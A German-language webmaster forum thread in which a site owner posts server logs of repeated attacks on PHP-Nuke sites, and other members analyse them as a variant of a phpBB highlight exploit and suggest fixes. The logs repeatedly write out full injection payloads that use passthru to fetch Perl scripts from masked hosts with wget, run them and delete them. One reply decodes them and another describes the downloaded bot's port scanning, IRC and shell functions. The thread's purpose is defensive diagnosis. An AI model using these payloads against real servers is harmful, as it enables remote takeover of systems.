Suche

[soxin]

Hi,
seit tagen werden meine Nukeseiten bombadiert mit Hackangriffen.

Wer hat noch dieses Problem???

Sie versuchen über  /modules.php?op=modload&rush über wget eine datei reinzuladen..

Zum Glück ist das bis jetzt noch nicht passiert..

Einige Auszüge:

IP: 83.246.112.26
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

IP: 130.230.88.16
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20atxxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

IP: 212.100.254.201
  URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';

URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';

  IP: 210.245.161.135
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

  IP: 65.75.177.60
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0AXXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget%20xxxxx.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611112;rm%20sess_189f0f0889555397a4de5485dd611112;perl%20%0Asess_189f0f0889555397a4de5485dd611111;rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

Hat jemand eine Ahnung was damit erreicht wird.. ??

Wie kann ic´h solche Hackangriffe abwehren?
8O DANKE

[jubilee]

Hallo !
Ich würde fast sagen, er versucht eine Session-Datei in Dein /tmp-Verzeichnis hochzuladen.

/modules.php?op=modload&rush=echo _START_; cd /tmp;
wget XXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget XXXXX.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611112;
rm sess_189f0f0889555397a4de5485dd611112;
perl sess_189f0f0889555397a4de5485dd611111;
rm sess_189f0f0889555397a4de5485dd611111; echo _END_&
highlight==passthru($HTTP_GET_VARS[rush]);

(urldecode("%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20") = echo _START_;)
(urldecode("%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&) = ; echo _END_&  )
( urldecode "%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\'") = =%27.passthru($HTTP_GET_VARS[rush]).%27  )

Versucht also jemand Dir eine fremde Session unterzujubeln.
Dass hier keine Misverständnisse aufkommen. In diesen Dateien stehen keine Sessioninformationen. Sie sehen nur wie Session-Dateien aus. Ich habe die Qiuelltexte der Dateien und es sind recht umfangreiche Perl-Scripte die schon einiges bewirken können.
Kann beim vkpmx nix passieren weil die Session in der Datenbank gespeichert wird.
Trotzdem @Tora: Wir sollten uns mal mit den anderen kurzschließen (rio z.B. ) ob da Potential drinne steckt.
Evt auch eine alte Sache, ich habs aber auf die Schnelle nicht gefunden,.
Den Servernamen habe ich ausgeixt, damit niemand auf "Gedanken" kommt.

MfG
jubilee

[NeMeSiSX2LC]

Soweit ich es noch weiss nutzt soxin kein MX

[RiotheRat]

Moin jubilee,

ICQ ist an und meine neue Telenummer jag ich Dir mal per PN rüber ... liest sich erstmal bedenklich. Und die PERL-Schiene scheint sich zu verbreiten, ich denke da an die letzte Sache mit dem Highlight-Parser vom phpBB.

Liest sich erstmal nicht nach Script-Kiddie ...

RtR

[Andi]

Moin

denke das ist immernoch der phpBB Exploit, in etwas abgewandelter Form.
Habe über Google folgende Seiten über das Thema gefunden:
http://voidmain.is-a-geek.net/forums/viewtopic.php?p=8501
http://castlecops.com/article5642.html

Unter anderem ist mir bei der Suche sogar ein Pyton-Script begegnet....
Da ist ganz schön was im Busch.

Betrifft in Nuke-Systemen m.E. bis jetzt nur das phpBB-Forum.

[NeMeSiSX2LC]

Oder halt Nuke seiten mit dem alten bbport drinne oder nicht?

[Andi]

Oder halt Nuke seiten mit dem alten bbport drinne oder nicht?

Hmm, eigentlich meinte ich das. Ob das ein port ist oder direkt in Nuke drin ist, da mache ich keinen Unterschied... Nuke halt....

[NeMeSiSX2LC]

PHP-Nuke ja weil mittlerwile gibts auch eine Nuke weiter entwicklung wo sowas nicht der Fall ist. Aber trotzdem den zusatz nuke haben. Nein ich mein nicht Postnuke

[jubilee]

Hmmm ....
Die haben das Suchmuster im einen Script ein wenig verschleiert.
In der Tat wird in Altavista nach einer topic.php gesucht.
Eines steht jedensfalls fest. Wer es schafft, das 2 Script auf einem Server zu aktivieren,
der kann auf dem Server machen, was er will.
Er versteckt sich und versucht das beenden des Scriptes zu verhindern :

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

Portscan auf "21","22","23","25","53","80","110","143"
IRC-Server wird initiert...
Shellzugriff wird versucht bzw. Ausgaben werden umgeleitet...
Es werden auch diverse Socketverbindungen eingerichtet.
Ich denke das ist eine Vorstufe um den kompletten Server zu übernehmen.
Also weitab von den Spielchen nur einige Webseiten zu löschen ....
Mfg
jubilee

[Andi]

@ NeMeSiSX2LC

Die Verbreitung von vkpMx, cpg-Nuke, nsn-Nuke usw. ist im Vergleich zur Verbreitung des Originals so gering, dass sich niemand die Mühe machen wird, speziell diese Systeme zu knacken.

Also ist diese Namens-Haarspalterei völlig uninteressant.

Es gibt hunderttausende betroffene Seiten. Und welcher Newbie-Webmaster achtet schon darauf, ständig das neuste Update drauf zu haben?

[NeMeSiSX2LC]

NSN ist auch sicher hart *scherz* Ja hast schon recht. Man sieht es ja oft genug hier. Axo gibts eigentlich was nach DAU und vor Newbie

[soxin]

Also ich verwende eine umgebaute Version von VKP 5.5 und auf einer anderen Seite eine umgebaute Version von 6.x ...

Ich habe in den letzten 30 minuten ca. 50 sicherheitemails bekommen

IP: 66.194.75.151
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%20sexxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 21:05:48

IP: 80.190.192.103
  URL: /modules.php?op=modload&rush=echo%20_START_%3B%20cd%20/tmp;wget%20sexxx.com/~private/a.txt;wget%20sexxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:57:08



IP: 69.30.194.70
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%20sxxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:51:33


IP: 66.79.176.210
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%20xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:47:06


IP: 66.246.218.32
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:18:50

IP: 82.192.75.160
  URL: /modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';
  Refer:
  Date/Time: 07.01.05 / 20:10:39

Passiert da eigentlich irgendwas?
op=modload gibt es das überhaupt bei phpnuke?

ich habe in die module.php das mal eingefügt:

if($op=="modload")
{
echo"**UPS** YOU ; I WILL GET YOU!!!";
die;
}

Weiß aber nicht ob das angezeigt wird..

hat jemand eine Odee wie ich das stoppen kann?
Danke

[Biker]

Jooooo...geht!



Gruß
Bernd

[Andi]

MOin Soxin 

modload ist ein Überbleibsel aus alten phpNuke Versionen und hat eigentlich keine Funktion mehr. Zur Kompatibilität wird es aber noch in der modules.php abgefragt (auch im vkpMx) . Verschiedene Module verwenden diesen Übergabeparameter auch noch, z.B. das eBoard.
Die Cracker könnten das modload in der URL also auch weglassen, das hat keine Auswirkung.

Lies mal hier:
http://board.pragmamx.de/index.php?topic=11736.0

Hier steht ein einfacher Weg um den entstehenden Traffic zu verringern:
http://board.pragmamx.de/index.php?topic=11734.0

[soxin]

Jooooo...geht!



Gruß
Bernd

@Bernd
wenn ich das eingebe:

/modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

dann geht es leider nicht..

@Tora, danke
Leider bin ich nun nicht schlau daraus geworden.
Das mit dem phpbb ist mir bekannt da ich auch ein phpbb forum laufen lasse (http://www.skype-forum.com) ..
was hat das nun mit dem Nuke zu tun

Wie kann ich das

/modules.php?op=modload&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%xxx.com/~private/a.txt;wget%xxx.com/~private/w.txt;perl%20a.txt;rm%20a.txt;perl%20w.txt;rm%20w.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';

stoppen.. bzw. abfangen .. mit

if($op=="modload")
{
echo"**UPS** YOU ; I WILL GET YOU!!!";
die;
}

geht es leider nur teilweise.

P.S.: Ich liebe dieses Forum, auch wenn es sich schon sehr verändert hat..
Schaue hoch zu Sascha